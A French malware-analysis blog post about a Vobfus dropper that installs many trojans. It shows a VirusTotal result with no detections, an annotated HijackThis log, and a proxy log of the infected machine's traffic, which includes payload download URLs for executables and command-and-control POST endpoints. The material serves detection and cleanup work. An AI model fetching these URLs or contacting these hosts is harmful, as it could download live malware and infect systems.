Vofbus : méga pack

Depuis quelques jours Vofbus installe un « méga » pack de malwares qui pourri les machines.
Un petit aperçu avec la mise à jour d’aujourd’hui : http://www3.malekal.com/malwares/index.php?&hash=a8c6444ff84daa2d2730002cfaceaeaf

=> http://www.virustotal.com/file-scan/report.html?id=1a7ed8a7d77ae248e5c56f79190a7c4bba71486e587156afdd3bf08e6d8e6088-1306234555

La détection VirusTotal parle d’elle même :

File name: a8c6444ff84daa2d2730002cfaceaeaf
Submission date: 2011-05-24 10:55:55 (UTC)
Current status: finished
Result: 0/ 43 (0.0%)
 

Print results
Antivirus     Version     Last Update     Result
AhnLab-V3    2011.05.24.03    2011.05.24    -
AntiVir    7.11.8.117    2011.05.24    -
Antiy-AVL    2.0.3.7    2011.05.24    -
Avast    4.8.1351.0    2011.05.24    -
Avast5    5.0.677.0    2011.05.24    -
AVG    10.0.0.1190    2011.05.24    -
BitDefender    7.2    2011.05.24    -
CAT-QuickHeal    11.00    2011.05.24    -
ClamAV    0.97.0.0    2011.05.24    -
Commtouch    5.3.2.6    2011.05.24    -
Comodo    8814    2011.05.24    -
DrWeb    5.0.2.03300    2011.05.24    -
Emsisoft    5.1.0.5    2011.05.24    -
eSafe    7.0.17.0    2011.05.22    -
eTrust-Vet    36.1.8344    2011.05.24    -
F-Prot    4.6.2.117    2011.05.24    -
F-Secure    9.0.16440.0    2011.05.24    -
Fortinet    4.2.257.0    2011.05.22    -
GData    22    2011.05.24    -
Ikarus    T3.1.1.104.0    2011.05.24    -
Jiangmin    13.0.900    2011.05.23    -
K7AntiVirus    9.103.4707    2011.05.23    -
Kaspersky    9.0.0.837    2011.05.24    -
McAfee    5.400.0.1158    2011.05.24    -
McAfee-GW-Edition    2010.1D    2011.05.23    -
Microsoft    1.6903    2011.05.24    -
NOD32    6147    2011.05.24    -
Norman    6.07.07    2011.05.23    -
nProtect    2011-05-24.01    2011.05.24    -
Panda    10.0.3.5    2011.05.23    -
PCTools    7.0.3.5    2011.05.19    -
Prevx    3.0    2011.05.24    -
Rising    23.59.01.03    2011.05.24    -
Sophos    4.65.0    2011.05.24    -
SUPERAntiSpyware    4.40.0.1006    2011.05.24    -
Symantec    20111.1.0.186    2011.05.24    -
TheHacker    6.7.0.1.203    2011.05.23    -
TrendMicro    9.200.0.1012    2011.05.24    -
TrendMicro-HouseCall    9.200.0.1012    2011.05.24    -
VBA32    3.12.16.0    2011.05.24    -
VIPRE    9374    2011.05.24    -
ViRobot    2011.5.24.4476    2011.05.24    -
VirusBuster    13.6.369.0    2011.05.23    -
Additional information
MD5   : a8c6444ff84daa2d2730002cfaceaeaf
SHA1  : e3959da7428073bee700c7a5c581ecacbc8419d2
SHA256: 1a7ed8a7d77ae248e5c56f79190a7c4bba71486e587156afdd3bf08e6d8e6088

Le dropper installe tout le joli petit monde :On se retrouve très vite avec une multitude de malwares avec en autre :

Le rapport HijackThis obtenu (un rapport OTL est disponible sur pjjoint : http://pjjoint.malekal.com/files.php?read=q10w1510s9x14y15s7c15c9&html=on ).

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:46:30, on 24/05/2011
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\VMware\VMware Tools\vmacthlp.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
C:\DOCUMENTS AND SETTINGS\MAK\BUREAU\PROCEXP.EXE
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\WINDOWS\aadrive32.exe
C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\avp.exe
C:\WINDOWS\lsass.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe
C:\WINDOWS\avp.exe
C:\WINDOWS\avp32.exe
C:\WINDOWS\spoolsv.exe
C:\WINDOWS\user.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\winlogon.exe
C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Documents and Settings\Mak\Application Data\2.tmp
C:\WINDOWS\System32\wbem\wmiprvse.exe
C:\Documents and Settings\Mak\rsvhost.exe
C:\Documents and Settings\Mak\xqqoid.exe
C:\Documents and Settings\Mak\Bureau\HiJackThis.exe
C:\WINDOWS\System32\wbem\wmiprvse.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: C:\WINDOWS\system32\jb6xrjo.dll - {24A123C3-A500-99BD-A120-04B53A2C8952} - C:\WINDOWS\system32\jb6xrjo.dll - W32/Spyware-WebActiveClick-based mais fait parti de Trojan.Win32.Ertfor
O2 - BHO: (no name) - {F569D725-C1CC-4A9F-4B6E-9923A41BB8F9} - c:\windows\system32\uqmcbwbu.dll - Trojan.Agent/Gen-Clicker
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [VMware Tools] "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
O4 - HKLM\..\Run: [VMware User Process] "C:\Program Files\VMware\VMware Tools\VMwareUser.exe"
O4 - HKLM\..\Run: [Malwarebytes' Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [HNUdHTgqO] C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [Microsoft Driver Setup] C:\WINDOWS\aadrive32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKfre] C:\WINDOWS\wininst.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgoA] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKfsc] C:\WINDOWS\winlogon.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKZe] C:\WINDOWS\avp.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKeg] C:\WINDOWS\smss.exe- Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgrA] C:\DOCUME~1\Mak\LOCALS~1\Temp\win32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKctc] C:\WINDOWS\msmgm.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKZSc] C:\WINDOWS\avp32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKeuf] C:\WINDOWS\spoolsv.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKee] C:\WINDOWS\user.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgre] C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgpta] C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe- Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgrsc] C:\DOCUME~1\Mak\LOCALS~1\Temp\winlogon.exe - Trojan.ErtforO4 - HKLM\..\Run: [MKcrc] C:\WINDOWS\login.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKcZ] C:\WINDOWS\mdm.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgph] C:\DOCUME~1\Mak\LOCALS~1\Temp\setup.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgoe] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [HNUdHTgl/] C:\DOCUME~1\Mak\LOCALS~1\Temp\gdi32.exe - Trojan.Ertfor
O4 - HKLM\..\Run: [MKcuc] C:\WINDOWS\lsass.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe 
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [HNUdHTgqO] C:\DOCUME~1\Mak\LOCALS~1\Temp\tje8p.exe- Trojan.Ertfor
O4 - HKCU\..\Run: [12CFG214-K641-12SF-N85P] C:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308-1811\vsbntlo.exe - Trojan.Win32.Small / IRC.Bacdoor (détecté aussi par erreur en Trojan.FakeAlert)
O4 - HKCU\..\Run: [MKfre] C:\WINDOWS\wininst.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgoA] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKfsc] C:\WINDOWS\winlogon.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKZe] C:\WINDOWS\avp.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [engel] C:\Documents and Settings\Mak\Application Data\2.tmp.exe - Trojan.Dugenpal / TrojWare.Win32.Wintu
O4 - HKCU\..\Run: [MKeg] C:\WINDOWS\smss.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgrA] C:\DOCUME~1\Mak\LOCALS~1\Temp\win32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKctc] C:\WINDOWS\msmgm.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKZSc] C:\WINDOWS\avp32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKeuf] C:\WINDOWS\spoolsv.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKee] C:\WINDOWS\user.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgre] C:\DOCUME~1\Mak\LOCALS~1\Temp\smss.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgpta] C:\DOCUME~1\Mak\LOCALS~1\Temp\services.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgrsc] C:\DOCUME~1\Mak\LOCALS~1\Temp\winlogon.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKcrc] C:\WINDOWS\login.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKcZ] C:\WINDOWS\mdm.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgph] C:\DOCUME~1\Mak\LOCALS~1\Temp\setup.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgoe] C:\DOCUME~1\Mak\LOCALS~1\Temp\avp.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [HNUdHTgl/] C:\DOCUME~1\Mak\LOCALS~1\Temp\gdi32.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [MKcuc] C:\WINDOWS\lsass.exe - Trojan.Ertfor
O4 - HKCU\..\Run: [xqqoid] C:\Documents and Settings\Mak\xqqoid.exe /E - Trojan.VobFus
O4 - HKLM\..\Policies\Explorer\Run: [Microsoft Driver Setup] C:\WINDOWS\aadrive32.exe - Backdoor.Win32.Floder
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O9 - Extra button: Fiddler2 - {CF819DA3-9882-4944-ADF5-6EF17ECF3C6E} - "C:\Program Files\Fiddler2\Fiddler.exe" (file missing)
O9 - Extra 'Tools' menuitem: Fiddler2 - {CF819DA3-9882-4944-ADF5-6EF17ECF3C6E} - "C:\Program Files\Fiddler2\Fiddler.exe" (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\program files\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll
O10 - Unknown file in Winsock LSP: c:\program files\vmware\vmware tools\vsock sdk\bin\win32\vsocklib.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{99894DA6-6832-4ABD-BD49-E078DE026639}: NameServer = 80.10.246.2
O17 - HKLM\System\CCS\Services\Tcpip\..\{FB4F16C9-47D3-43E4-B696-743350A506B0}: NameServer = 80.10.246.2
O20 - Winlogon Notify: TPSvc - C:\WINDOWS\SYSTEM32\TPSvc.dll
O20 - Winlogon Notify: VMUpgradeAtShutdown - C:\WINDOWS\SYSTEM32\VMUpgradeAtShutdownWXP.dll
O22 - SharedTaskScheduler: osklef87hgudufhg87fuyATU7 - {24A123C3-A500-99BD-A120-04B53A2C8952} - C:\WINDOWS\system32\jb6xrjo.dll - W32/Spyware-WebActiveClick-based mais fait parti de Trojan.Win32.Ertfor
O23 - Service: TP AutoConnect Service (TPAutoConnSvc) - ThinPrint AG - C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
O23 - Service: TP VC Gateway Service (TPVCGateway) - ThinPrint AG - C:\Program Files\VMware\VMware Tools\TPVCGateway.exe
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
O23 - Service: Aide de la mise à niveau VMware (VMUpgradeHelper) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
O23 - Service: Service d'aide du disque physique VMware (VMware Physical Disk Helper Service) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\vmacthlp.exe

--
End of file - 7955 bytes

Les connexions WEB établies :

1306231669.128    574 192.168.1.27 TCP_MISS/302 1183 POST http://co102w.col102.mail.live.com/mail/SaveSentMessages.aspx?n=1181253781 - DIRECT/65.55.33.119 text/html
1306231671.317    775 192.168.1.27 TCP_MISS/200 14227 GET http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1287432649&rver=4.5.2130.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx%3Frru%3Dinbox&id=84839 - DIRECT/65.54.186.10 text/html
1306231689.340  63099 192.168.1.27 TCP_MISS/504 1515 POST http://71.58.170.102/u/ - DIRECT/71.58.170.102 text/html
1306231714.090   1023 192.168.1.27 TCP_MISS/200 97594 GET http://co102w.col102.mail.live.com/mail/InboxLight.aspx?n=1181253781 - DIRECT/65.55.33.119 text/html
1306231749.373    800 192.168.1.27 TCP_MISS/200 12462 POST http://co102w.col102.mail.live.com/mail/mail.fpp?cnmn=Microsoft.Msn.Hotmail.Ui.Fpp.MailBox.GetInboxData&ptid=0&a=BHIOs%2bMThVFvKN1h6WqACg%3d%3d&au=739537469 - DIRECT/65.55.33.119 application/x-javascript
1306231750.264  63104 192.168.1.27 TCP_MISS/504 1515 POST http://71.58.170.102/u/ - DIRECT/71.58.170.102 text/html
1306231829.336  63101 192.168.1.27 TCP_MISS/504 1515 POST http://71.86.118.158/u/ - DIRECT/71.86.118.158 text/html
1306232689.111    989 192.168.1.27 TCP_MISS/504 1513 POST http://61.125.77.240/s/ - DIRECT/61.125.77.240 text/html
1306233432.461    740 192.168.1.27 TCP_MISS/302 414 GET http://montefl.info/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/123.100.251.58 text/html
1306233432.584    101 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233432.757     97 192.168.1.27 TCP_MISS/302 414 GET http://prioset.org/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233432.799     39 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233436.068     71 192.168.1.27 TCP_MISS/200 390 GET http://api.wipmania.com/ - DIRECT/213.251.170.52 text/html
1306233437.604    328 192.168.1.27 TCP_MISS/200 34190 GET http://91.200.241.40/999.exe - DIRECT/91.200.241.40 application/octet-stream
1306233438.713     74 192.168.1.27 TCP_MISS/302 414 GET http://prioset.org/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233438.808     76 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233439.388    725 192.168.1.27 TCP_MISS/200 28050 GET http://96.44.181.226/images/3383.exe - DIRECT/96.44.181.226 application/x-msdos-program
1306233440.778    326 192.168.1.27 TCP_MISS/200 47907 GET http://91.200.241.40/bnet.exe - DIRECT/91.200.241.40 application/octet-stream
1306233441.098    203 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/lmzdd.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.104    207 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/vvvjzar.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.282    180 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/ivjwneei.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.287    180 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/uhhymdqu.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.293    184 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/kxyyp.php?adv=adv600&code1=JNQC&code2=8103&id=1080276621&p=1&b=1&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.466    181 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/scctgxkbb.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.474    181 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/bosgwxbeff.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.481    180 192.168.1.27 TCP_MISS/404 277 GET http://aemodern.com/bdqqu/lyyyzdduh.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233441.596    127 192.168.1.27 TCP_MISS/000 0 GET http://aemodern.com/bdqqu/wjwwnae.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 -
1306233441.596    119 192.168.1.27 TCP_MISS/000 0 GET http://aemodern.com/bdqqu/vvvmmddhvl.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 -
1306233441.596    110 192.168.1.27 TCP_MISS/000 0 GET http://aemodern.com/bdqqu/hhlycptx.php?adv=adv600&id=1080276621&c=135019922 - DIRECT/195.2.240.75 -
1306233442.186    346 192.168.1.27 TCP_MISS/200 59876 GET http://91.200.241.40/nw1jdcbhs.exe - DIRECT/91.200.241.40 application/octet-stream
1306233479.231    388 192.168.1.27 TCP_MISS/302 1247 POST http://msdn.microsoft.com/ - DIRECT/65.55.11.235 text/html
1306233479.791    947 192.168.1.27 TCP_MISS/302 1247 POST http://msdn.microsoft.com/ - DIRECT/65.55.11.235 text/html
1306233493.741    693 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233500.648    695 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233502.789   1009 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233504.756  63118 192.168.1.27 TCP_MISS/504 1541 GET http://ppppnipponp.r7m.us/cgi-bin/p.cgi - DIRECT/1.1.1.1 text/html
1306233512.508  63104 192.168.1.27 TCP_MISS/504 1541 GET http://ppppnipponp.r7m.us/cgi-bin/p.cgi - DIRECT/1.1.1.1 text/html
1306233514.231     75 192.168.1.27 TCP_MISS/302 414 GET http://prioset.org/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233514.365     75 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233515.163    992 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233521.443    381 192.168.1.27 TCP_MISS/200 1567 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233522.958    255 192.168.1.27 TCP_MISS/200 1567 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233532.177    836 192.168.1.27 TCP_MISS/200 36049 GET http://31.184.237.32/b.exe - DIRECT/31.184.237.32 application/x-msdownload
1306233567.517    205 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/vvvjzar.php?adv=adv413&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233571.428    180 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/lmzdd.php?adv=adv413&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233572.199    183 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/vvvmmddhvl.php?adv=adv413&id=1080276621&c=135019922 - DIRECT/195.2.240.75 text/html
1306233578.689    181 192.168.1.27 TCP_MISS/404 277 GET http://aaaholic.com/bdqqu/kxyyp.php?adv=adv413&code1=KNIC&code2=0104&id=1080276621&p=1&b=1&c=135019922 - DIRECT/195.2.240.75 text/html
1306233594.428  63100 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233595.599   2584 192.168.1.27 TCP_MISS/200 89462 GET http://31.184.237.43/ngjefw.exe - DIRECT/31.184.237.43 application/octet-stream
1306233605.252  63097 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233616.412  63101 192.168.1.27 TCP_MISS/504 1515 POST http://68.60.106.144/s/ - DIRECT/68.60.106.144 text/html
1306233630.416  63103 192.168.1.27 TCP_MISS/504 1515 POST http://68.60.106.144/s/ - DIRECT/68.60.106.144 text/html
1306233648.711   3198 192.168.1.27 TCP_MISS/504 1514 POST http://91.176.198.112/s/ - DIRECT/91.176.198.112 text/html
1306233651.836  63101 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233652.678    425 192.168.1.27 TCP_MISS/502 1504 POST http://68.69.67.206/s/ - DIRECT/68.69.67.206 text/html
1306233654.754  21165 192.168.1.27 TCP_MISS/504 1514 POST http://91.176.198.112/s/ - DIRECT/91.176.198.112 text/html
1306233655.013    424 192.168.1.27 TCP_MISS/502 1504 POST http://68.69.67.206/s/ - DIRECT/68.69.67.206 text/html
1306233655.460  63101 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/s/ - DIRECT/70.104.104.153 text/html
1306233658.454    698 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233664.131    691 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233666.616  63100 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/s/ - DIRECT/70.104.104.153 text/html
1306233669.258    999 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233670.567    995 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
1306233676.635   1047 192.168.1.27 TCP_MISS/200 163848 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233689.403    143 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233689.403    143 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233698.232    153 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233710.584     78 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233715.356  63103 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233719.090     79 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233720.289     78 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233731.441     79 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233738.665     78 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233739.302    717 192.168.1.27 TCP_MISS/302 414 GET http://montefl.info/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/123.100.251.58 text/html
1306233740.087     77 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/95.211.72.209 text/html
1306233749.063     86 192.168.1.27 TCP_MISS/200 353 GET http://ekosearch.com/rz/mn.php?ver=H1&vc=V2.30- - DIRECT/95.211.73.165 text/html
1306233770.172     83 192.168.1.27 TCP_MISS/200 345 GET http://comcmdrun.com/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233774.523   1130 192.168.1.27 TCP_MISS/200 227336 POST http://83.222.124.186/s/ - DIRECT/83.222.124.186 text/html
1306233780.011     83 192.168.1.27 TCP_MISS/302 412 GET http://prioset.org/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233780.665     80 192.168.1.27 TCP_MISS/200 350 GET http://comcmdrun.com/dw/dw.php?id=1CC19F6453407CE&ver=dm1&tp=p - DIRECT/95.211.72.209 text/html
1306233783.312  63101 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233815.360  63102 192.168.1.27 TCP_MISS/504 1736 GET http://95.143.193.138/xxxx_5/bGcyMDAwfG5vbmFtZXwzMDAwMHwxfDAuMDN8MC4xNzV8NS4xIDI2MDAgU1AyLjB8b3RsODg4fF9DbWRFeGVjU2VydmVyc3xzdGFydA== - DIRECT/95.143.193.138 text/html
1306233833.280    197 192.168.1.27 TCP_MISS/504 1514 POST http://91.176.198.112/s/ - DIRECT/91.176.198.112 text/html
1306233842.093    696 192.168.1.27 TCP_MISS/504 1513 POST http://99.23.240.160/s/ - DIRECT/99.23.240.160 text/html
1306233843.032  63104 192.168.1.27 TCP_MISS/504 1800 GET http://95.143.193.138/xxxx_5/bGcyMDAwfG5vbmFtZXwzMDAwMHwxfDAuMDN8MC4xNzV8NS4xIDI2MDAgU1AyLjB8b3RsODg4fENtZEV4ZWNNYWlufGZhaWxlZHxodHRwczovL2xpdDBncmFwaHktdHlwZS5jb20v - DIRECT/95.143.193.138 text/html
1306233843.688  63103 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233845.308  63104 192.168.1.27 TCP_MISS/504 1518 POST http://70.104.104.153/u/ - DIRECT/70.104.104.153 text/html
1306233858.684  63101 192.168.1.27 TCP_MISS/504 1515 POST http://83.223.182.13/s/ - DIRECT/83.223.182.13 text/html
1306233859.283    719 192.168.1.27 TCP_MISS/302 414 GET http://montefl.info/dw/dw.php?id=1-1CC19F739714D88&ver=dm1&tp=d - DIRECT/123.100.251.58 text/html
1306233859.580   1015 192.168.1.27 TCP_MISS/504 1516 POST http://190.174.119.60/s/ - DIRECT/190.174.119.60 text/html
